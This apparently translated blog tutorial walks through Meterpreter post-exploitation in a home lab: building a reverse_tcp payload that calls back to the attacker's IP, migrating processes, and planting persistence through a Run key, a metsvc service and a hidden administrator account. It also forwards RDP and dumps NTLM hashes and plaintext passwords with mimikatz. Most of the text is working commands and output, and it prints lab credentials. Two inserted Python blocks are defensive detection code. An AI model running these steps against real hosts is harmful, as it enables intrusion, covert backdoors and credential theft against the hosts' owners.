
A First Look at Meterpreter


Attacker side:
OS: Kali
IP: 192.168.111.129

Victim side:
OS: Windows Server 2008 (64-bit)
IP: 192.168.111.133

First, generate the Meterpreter payload on Kali:

root@Kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2013 X > file.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.111.129", "LPORT"=>"2013"}

Next, configure the listener:

root@Kali:~# msfconsole
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.111.129
LHOST => 192.168.111.129
msf exploit(handler) > set LPORT 2013
LPORT => 2013
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.111.129:2013
[*] Starting the payload handler...

Then run file.exe on the Windows 2008 host, and a Meterpreter session comes back:

[*] Sending stage (769024 bytes) to 192.168.111.133
[*] Meterpreter session 1 opened (192.168.111.129:2013 -> 192.168.111.133:49168) at 2014-03-13 22:23:18 +0800

meterpreter >

On to the main topic.
(1) Migrating Meterpreter to another process
During a penetration test the current Meterpreter process can easily be killed for all sorts of reasons, so migrating Meterpreter into a long-running system process is a good idea.

meterpreter > getuid  // check current privileges
Server username: WIN-K30V5SI0PCE\Administrator
meterpreter > ps      // list current processes

Process List
============

 PID   PPID  Name              Arch    Session     User                           Path
 ---   ----  ----              ----    -------     ----                           ----
 0     0     [System Process]          4294967295
 4     0     System            x86_64  0
 244   4     smss.exe          x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\smss.exe
 264   492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 336   328   csrss.exe         x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\csrss.exe
 388   380   csrss.exe         x86_64  1           NT AUTHORITY\SYSTEM            C:\Windows\System32\csrss.exe
 396   328   wininit.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\wininit.exe
 432   380   winlogon.exe      x86_64  1           NT AUTHORITY\SYSTEM            C:\Windows\System32\winlogon.exe
 492   396   services.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\services.exe
 500   396   lsass.exe         x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\lsass.exe
 512   396   lsm.exe           x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\lsm.exe
 596   492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 656   492   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
 748   492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 796   492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 840   492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 856   388   conhost.exe       x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\System32\conhost.exe
 860   2044  cmd.exe           x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\System32\cmd.exe
 884   492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 924   492   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
 972   492   sppsvc.exe        x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\sppsvc.exe
 976   492   spoolsv.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\spoolsv.exe
 1056  492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 1092  492   vmtoolsd.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1332  492   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
 1492  2044  vmtoolsd.exe      x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1560  492   dllhost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\dllhost.exe
 1640  492   msdtc.exe         x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\msdtc.exe
 1968  492   taskhost.exe      x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\System32\taskhost.exe
 2024  884   dwm.exe           x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\System32\dwm.exe
 2044  2016  explorer.exe      x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\explorer.exe
 2204  2428  mscorsvw.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 2312  492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 2332  2044  file.exe          x86     1           WIN-K30V5SI0PCE\Administrator  C:\Users\Administrator\Desktop\file.exe
 2428  492   mscorsvw.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 2588  492   mscorsvw.exe      x86     0           NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
 2972  492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe

meterpreter > migrate 2044 // migrate to the explorer process with PID 2044
[*] Migrating from 2332 to 2044...
[*] Migration completed successfully.
meterpreter >

Verify:

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch    Session     User                           Path
 ---   ----  ----              ----    -------     ----                           ----
 0     0     [System Process]          4294967295
 4     0     System            x86_64  0
 244   4     smss.exe          x86_64  0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 264   492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\system32\svchost.exe
 336   328   csrss.exe         x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\csrss.exe
 388   380   csrss.exe         x86_64  1           NT AUTHORITY\SYSTEM            C:\Windows\system32\csrss.exe
 396   328   wininit.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\wininit.exe
 432   380   winlogon.exe      x86_64  1           NT AUTHORITY\SYSTEM            C:\Windows\system32\winlogon.exe
 492   396   services.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\services.exe
 500   396   lsass.exe         x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\lsass.exe
 512   396   lsm.exe           x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\lsm.exe
 596   492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\svchost.exe
 656   492   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\system32\svchost.exe
 748   492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\system32\svchost.exe
 796   492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\svchost.exe
 840   492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\system32\svchost.exe
 856   388   conhost.exe       x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\system32\conhost.exe
 860   2044  cmd.exe           x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\system32\cmd.exe
 884   492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\svchost.exe
 924   492   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\system32\svchost.exe
 972   492   sppsvc.exe        x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\system32\sppsvc.exe
 976   492   spoolsv.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\spoolsv.exe
 1056  492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\system32\svchost.exe
 1092  492   vmtoolsd.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1332  492   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\system32\svchost.exe
 1492  2044  vmtoolsd.exe      x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1560  492   dllhost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\dllhost.exe
 1640  492   msdtc.exe         x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\system32\msdtc.exe
 1968  492   taskhost.exe      x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\system32\taskhost.exe
 2024  884   dwm.exe           x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\system32\Dwm.exe
 2044  2016  explorer.exe      x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\Explorer.EXE
 2312  492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\svchost.exe
 2428  492   mscorsvw.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 2588  492   mscorsvw.exe      x86     0           NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
 2972  492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\svchost.exe

As shown above, the file.exe process is gone. Note that if antivirus software is present, it may block the process injection.
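Added example, not from the original post: a parser for the `ps` listing format above and a defender-side triage pass over it. It flags what stood out in the listings before migration, namely 32-bit images running from user-writable or *.tmp directories on a 64-bit host. The sample listing is constructed from a few rows modelled on the output above; the helper `_row`, `parse_ps` and `flag_processes` are this example's own names.

```python
import re
from typing import Dict, List, Tuple


def _row(pid, ppid, name, arch, session, user="", path=""):
    """Lay one record out in the column widths Meterpreter's `ps` table uses."""
    return f" {pid:<5} {ppid:<5} {name:<17} {arch:<7} {session:<11} {user:<30} {path}".rstrip()


# Constructed listing in the format shown above: a handful of rows modelled on
# the page's output, not a capture from a real host.
SAMPLE_PS = "\n".join([
    _row("PID", "PPID", "Name", "Arch", "Session", "User", "Path"),
    _row("---", "----", "----", "----", "-------", "----", "----"),
    _row("4", "0", "System", "x86_64", "0"),
    _row("500", "396", "lsass.exe", "x86_64", "0", r"NT AUTHORITY\SYSTEM", r"C:\Windows\System32\lsass.exe"),
    _row("2044", "2016", "explorer.exe", "x86_64", "1", r"WIN-K30V5SI0PCE\Administrator", r"C:\Windows\explorer.exe"),
    _row("2332", "2044", "file.exe", "x86", "1", r"WIN-K30V5SI0PCE\Administrator", r"C:\Users\Administrator\Desktop\file.exe"),
    _row("2520", "372", "FfBoPtYGlNj.exe", "x86", "1", r"WIN-K30V5SI0PCE\Administrator",
         r"C:\Users\ADMINI~1\AppData\Local\Temp\1\rad87A98.tmp\FfBoPtYGlNj.exe"),
    _row("2588", "492", "mscorsvw.exe", "x86", "0", r"NT AUTHORITY\SYSTEM", r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe"),
])

# Directories an unprivileged user can write to; an image loaded from here deserves a look.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")


def parse_ps(text: str) -> List[Dict[str, str]]:
    """Split a `ps` table into dicts, slicing each row at the header's column
    offsets so that users and paths containing spaces survive intact."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    cols = [(m.group(), m.start()) for m in re.finditer(r"\S+", lines[0])]
    records = []
    for line in lines[1:]:
        if set(line.strip()) <= set("- "):      # the ---- separator row
            continue
        rec = {}
        for i, (col, start) in enumerate(cols):
            end = cols[i + 1][1] if i + 1 < len(cols) else None
            rec[col] = line[start:end].strip()
        records.append(rec)
    return records


def flag_processes(records: List[Dict[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Return (pid, name, reasons) for the processes a responder should look at first."""
    host_is_64bit = any(r["Arch"] == "x86_64" for r in records)
    hits = []
    for r in records:
        path, reasons = r["Path"].lower(), []
        if any(seg in path for seg in USER_WRITABLE):
            reasons.append("image in a user-writable directory")
        if ".tmp\\" in path:
            reasons.append("image inside a *.tmp directory")
        if host_is_64bit and r["Arch"] == "x86" and path and not path.startswith("c:\\windows\\"):
            reasons.append("32-bit image on a 64-bit host outside C:\\Windows")
        if reasons:
            hits.append((r["PID"], r["Name"], reasons))
    return hits
```

Paste a listing captured from a session log into `parse_ps` and the 32-bit mscorsvw.exe under C:\Windows stays quiet while the Desktop and Temp images are reported.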
(2) Checking whether the target is a virtual machine

meterpreter > run post/windows/gather/checkvm

[*] Checking if WIN-K30V5SI0PCE is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >

My 2008 box is installed on VMware.
(3) Installing a backdoor
Method 1: the persistence script

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >

Run it:

meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2241
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs
[*] Executing script C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs
[+] Agent executed with PID 2916
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HstWtPyXHYnhQ
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HstWtPyXHYnhQ
meterpreter >

Now restart the server.
Reconfigure the listener:

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.111.129
LHOST => 192.168.111.129
msf exploit(handler) > set LPORT 2241
LPORT => 2241
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.111.129:2241
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.111.133
[*] Meterpreter session 1 opened (192.168.111.129:2241 -> 192.168.111.133:49159) at 2014-03-13 23:01:55 +0800

meterpreter >

As shown, the callback succeeded. This passive type of backdoor is a good choice in certain special situations.
Method 2: metsvc

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\ADMINI~1\AppData\Local\Temp\HzWbqqRpuBlxn...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
     * Installing service metsvc
     * Starting service
Service metsvc successfully installed.
meterpreter >

The metsvc backdoor is installed; next, connect to it:

root@Kali:~# msfconsole

Using notepad to track pentests? Have Metasploit Pro report on hosts,
services, sessions and evidence -- type 'go_pro' to launch it now.

       =[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0]
+ -- --=[ 1239 exploits - 755 auxiliary - 207 post
+ -- --=[ 324 payloads - 31 encoders - 8 nops

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set RHOST 192.168.111.133
RHOST => 192.168.111.133
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.111.129:49313 -> 192.168.111.133:31337) at 2014-03-13 23:12:54 +0800

meterpreter >

Method 3:
This one amounts to adding an account for remote access over 3389 (Remote Desktop):

meterpreter > run getgui -u zero -p haizeiwang123_
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*]     Adding User: zero with Password: haizeiwang123_
[*]     Hiding user from Windows Login screen
[*]     Adding User: zero to local group 'Remote Desktop Users'
[*]     Adding User: zero to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140314.4134.rc
meterpreter >
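Added example, not part of the original post: a defender's audit of the artifacts the three methods above leave behind, namely a Run value launching a script from %TEMP%, a service named metsvc whose image sits under %TEMP%, and an account hidden from the logon screen that holds Administrators or Remote Desktop Users membership. The registry values, service entries and group memberships are constructed for the example; the random-name heuristic is this example's own assumption, not a property of Metasploit.

```python
import re
from typing import Dict, List, Set

# Constructed artifacts modelled on what the three methods above leave behind
# (all values are made up for this example, not read from a real host).
RUN_VALUES = {  # HKLM\Software\Microsoft\Windows\CurrentVersion\Run: value name -> command
    "VMware User Process": r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr',
    "HstWtPyXHYnhQ": r'wscript.exe "C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs"',
}
SERVICES = {  # service name -> image path
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "metsvc": r"C:\Users\ADMINI~1\AppData\Local\Temp\HzWbqqRpuBlxn\metsvc.exe",
}
GROUPS = {"Administrators": {"Administrator", "zero"}, "Remote Desktop Users": {"zero"}}
# Winlogon\SpecialAccounts\UserList: a value of 0 hides the account from the logon screen
HIDDEN_USERS = {"zero": 0}

USER_WRITABLE = re.compile(r"\\(users|temp|appdata|programdata)\\", re.I)
SCRIPT_HOSTS = re.compile(r"\b(wscript|cscript|mshta|powershell)(\.exe)?\b", re.I)


def looks_random(name: str) -> bool:
    """Heuristic (assumption): long, letters only, with frequent case switches."""
    if len(name) < 10 or not name.isalpha():
        return False
    switches = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return switches >= 5


def audit_autoruns(run_values: Dict[str, str], services: Dict[str, str]) -> List[str]:
    """Flag Run values and services that match the persistence patterns above."""
    findings = []
    for kind, entries in (("Run value", run_values), ("service", services)):
        for name, command in entries.items():
            reasons = []
            if USER_WRITABLE.search(command):
                reasons.append("launches from a user-writable path")
            if SCRIPT_HOSTS.search(command):
                reasons.append("script host launcher")
            if looks_random(name):
                reasons.append("random-looking name")
            if name.lower() == "metsvc":
                reasons.append("default Meterpreter service name")
            if reasons:
                findings.append(f"{kind} '{name}': " + "; ".join(reasons))
    return findings


def hidden_privileged_users(groups: Dict[str, Set[str]], hidden: Dict[str, int]) -> List[str]:
    """Accounts hidden from the logon screen that also hold admin or RDP rights."""
    privileged = groups.get("Administrators", set()) | groups.get("Remote Desktop Users", set())
    return sorted(user for user, flag in hidden.items() if flag == 0 and user in privileged)
```

On a live host the same dictionaries can be filled from `reg query` and `net localgroup` output; the cleanup resource files printed by the scripts above list exactly the names to compare against.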

(4) Port forwarding
Targets that sit on an internal network are common, and Metasploit ships a port forwarding tool for that.

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

    -L <opt>  The local host to listen on (optional).
    -h        Help banner.
    -l <opt>  The local port to listen on.
    -p <opt>  The remote port to connect to.
    -r <opt>  The remote host to connect to.

meterpreter > portfwd add -L 1234 -p 3389 -r 192.168.111.133
[-] You must supply a local port, remote host, and remote port.
meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.111.133
[*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.111.133:3389
meterpreter >

Next, run:

rdesktop -u zero -p haizeiwang123_ 127.0.0.1:1234

and you can connect.
(5) Obtaining passwords
The French tool mimikatz can pull the operating system's plaintext passwords directly, and Meterpreter has added it as a module.
First, load the mimikatz module.
Because my Windows 2008 is 64-bit, I first have to migrate to a 64-bit process:

meterpreter > ps
......
 2000  472   dllhost.exe        x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\dllhost.exe
 2264  1832  explorer.exe       x86_64  2           WIN-K30V5SI0PCE\zero           C:\Windows\explorer.exe
 2292  2264  vmtoolsd.exe       x86_64  2           WIN-K30V5SI0PCE\zero           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2520  372   FfBoPtYGlNj.exe    x86     1           WIN-K30V5SI0PCE\Administrator  C:\Users\ADMINI~1\AppData\Local\Temp\1\rad87A98.tmp\FfBoPtYGlNj.exe
 2780  2256  winlogon.exe       x86_64  2           NT AUTHORITY\SYSTEM            C:\Windows\System32\winlogon.exe
 3028  880   dwm.exe            x86_64  2           WIN-K30V5SI0PCE\zero           C:\Windows\System32\dwm.exe

meterpreter > migrate 2780
[*] Removing existing TCP relays...
[*] Successfully stopped TCP relay on 0.0.0.0:1234
[*] 1 TCP relay(s) removed.
[*] Migrating from 1428 to 2264...
[*] Migration completed successfully.
[*] Recreating TCP relay(s)...
[*] Local TCP relay recreated: 0.0.0.0:1234 <-> 192.168.111.133:3389
meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter >

Retrieve the password hashes:

meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;339062  NTLM       WIN-K30V5SI0PCE  Administrator     lm{ 179b3f1af1324ade301c14040883a0d8 }, ntlm{ 358c0a328bdf6b42185ca0a1773fb0be }
0;593431  NTLM       WIN-K30V5SI0PCE  zero              lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }
0;593459  NTLM       WIN-K30V5SI0PCE  zero              lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }
0;995     Negotiate  NT AUTHORITY     IUSR              n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP        WIN-K30V5SI0PCE$  n.s. (Credentials KO)
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)
0;47971   NTLM                                          n.s. (Credentials KO)
0;999     NTLM       WORKGROUP        WIN-K30V5SI0PCE$  n.s. (Credentials KO)

Retrieve the plaintext passwords:

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;999     NTLM       WORKGROUP        WIN-K30V5SI0PCE$
0;996     Negotiate  WORKGROUP        WIN-K30V5SI0PCE$
0;47971   NTLM
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE
0;995     Negotiate  NT AUTHORITY     IUSR
0;339062  NTLM       WIN-K30V5SI0PCE  Administrator     ceshimima123_
0;593459  NTLM       WIN-K30V5SI0PCE  zero              haizeiwang123_
0;593431  NTLM       WIN-K30V5SI0PCE  zero              haizeiwang123_

Related articles: "A First Look at Meterpreter (1)", "SMB Relay Attacks Revisited".

【via@coolhacker】
